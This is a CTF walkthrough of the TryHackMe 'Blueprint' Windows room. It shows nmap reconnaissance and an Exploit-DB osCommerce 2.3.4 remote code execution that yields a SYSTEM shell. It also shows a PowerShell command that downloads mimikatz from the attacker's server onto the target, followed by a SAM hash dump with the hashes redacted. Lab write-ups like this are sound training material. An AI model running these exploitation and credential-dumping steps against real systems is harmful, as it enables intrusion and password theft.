I decided to try a bit more Penetration Testing/Ethical Hacking. The following is a Write-Up regarding the TryHackMe room “Blueprint”.
Tasks#
The only info that we have is:
Do you have what is takes to hack into this Windows Machine?
And the questions:
- “Lab” user NTLM hash decrypted
- root.txt
So we can assume it’s a Windows machine.
Discovery#
I booted up my Kali linux machine and created a folder on my Desktop to use as a workspace.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
| # create a workspace
mkdir Desktop/blueprint && cd Desktop/blueprint
# portscan with nmap
nmap -v -A -oN nmap-scan.txt 10.10.251.173
# nmap result
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: 404 - File or directory not found.
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-04-11 22:52 oscommerce-2.3.4/
| - 2019-04-11 22:52 oscommerce-2.3.4/catalog/
| - 2019-04-11 22:52 oscommerce-2.3.4/docs/
|_
| http-methods:
| Supported Methods: OPTIONS GET HEAD POST TRACE
|_ Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
|_SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
|_http-title: Index of /
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| http-methods:
| Supported Methods: OPTIONS GET HEAD POST TRACE
|_ Potentially risky methods: TRACE
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-04-11 22:52 oscommerce-2.3.4/
| - 2019-04-11 22:52 oscommerce-2.3.4/catalog/
| - 2019-04-11 22:52 oscommerce-2.3.4/docs/
|_
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -20m03s, deviation: 34m37s, median: -4s
| smb-os-discovery:
| OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: BLUEPRINT
| NetBIOS computer name: BLUEPRINT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-08-16T18:05:38+01:00
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-08-16T17:05:39
|_ start_date: 2024-08-16T17:02:15
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:a6:9b:93:fd:95 (unknown)
| Names:
| BLUEPRINT<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| BLUEPRINT<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
|
So we can observe:
- Windows 7 Home SP1 / 7601 - wow that’s quite old
- IIS on Port 80
- Apache 2.4.23 on Port 443 and 8080
- OSCommerce 2.3.4
- PHP 5.6.28
- OpenSSL 1.0.2h
- MSRPC on Port 135
- Netbios on Port 139
- SMB on Port 445 (stated as microsoft-ds)
- mySQL/MariaDB on Port 3306
- a few high ports with msrpc
- SMB scan could already retrieve some data as guest
All these outdated software’s probably have some vulnerabilities that I can use.
Initial Access: osCommerce 2.3.4 Exploit#
Nmap already found a installation of osCommerce - an Online Shop application. The directory name already hints the version: 2.3.4.
I quickly searched on Exploit-DB.com for osCommerce and found this exploit (EDB-ID 50128) by Bryan Leong <NobodyAtall>.
The underlying issue is, if the /install directory wasn’t removed after installation, it’s possible to execute commands.
Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php
Since I have searchsploit installed on my Kali VM, I probably already have that exploit on disk:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| # find the path of the local exploit
searchsploit 50128 -p
Exploit: osCommerce 2.3.4.1 - Remote Code Execution (2)
URL: https://www.exploit-db.com/exploits/50128
Path: /usr/share/exploitdb/exploits/php/webapps/50128.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
# execute the exploit, using the URL of the osCommerce installation as a single parameter
python3 /usr/share/exploitdb/exploits/php/webapps/50128.py http://10.10.251.173:8080/oscommerce-2.3.4/catalog/
[*] Install directory still available, the host likely vulnerable to the exploit.
[*] Testing injecting system command to test vulnerability
User: nt authority\system
RCE_SHELL$ whoami
nt authority\system
|
Okay, great. I got a shell, and I’m even running as NT Authority\SYSTEM. I think that’s a major misconfiguration to have the webserver run as SYSTEM, but well… It’s just an easy CTF game.
Retrieve root flag#
In CTF’s a root flag is often located on the Administrator’s Desktop (if it’s a Windows machine). So I checked the directory, using the RCE_Shell I got from the Exploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| RCE_SHELL$ dir C:\users\administrator\desktop
Volume in drive C has no label.
Volume Serial Number is 14AF-C52C
Directory of C:\users\administrator\desktop
11/27/2019 07:15 PM <DIR> .
11/27/2019 07:15 PM <DIR> ..
11/27/2019 07:15 PM 37 root.txt.txt
1 File(s) 37 bytes
2 Dir(s) 19,504,635,904 bytes free
RCE_SHELL$ more C:\users\administrator\desktop\root.txt.txt
THM{ **redacted to not ruin the fun** }
|
“Lab” user NTLM hash#
I already have the necessary permissions (again: I’m running as NT Authority\SYSTEM). To retrieve the NTLM hash, I chose to spin up a simple local webserver on my Kali machine, to download mimikatz to the target system.
1
2
| # in another terminal: spin up the webserver
python3 -m http.server 80
|
Then in the Exploit shell:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
| # download mimikatz using PowerShell
RCE_SHELL$ powershell (New-Object System.Net.WebClient).DownloadFile(\"http://10.14.85.51/mimikatz.exe\", \"mimikatz.exe\")
# dump the local SAM database using mimikatz
RCE_SHELL$ mimikatz "lsadump::sam" exit
.#####. mimikatz 2.2.0 (x86) #19041 Sep 19 2022 17:43:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::sam
Domain : BLUEPRINT
SysKey : 147a48de4a9815d2aa479598592b086f
Local SID : S-1-5-21-3130159037-241736515-3168549210
SAMKey : 3700ddba8f7165462130a4441ef47500
RID : 000001f4 (500)
User : Administrator
Hash NTLM: **redacted - to not spoil the fun**
RID : 000001f5 (501)
User : Guest
RID : 000003e8 (1000)
User : Lab
Hash NTLM: **redacted - to not spoil the fun**
mimikatz(commandline) # exit
Bye!
|
Neat! So I took the NTLM hash for the Lab user and checked it using NTLM.pw. Since the password was pretty simple, it was listed there.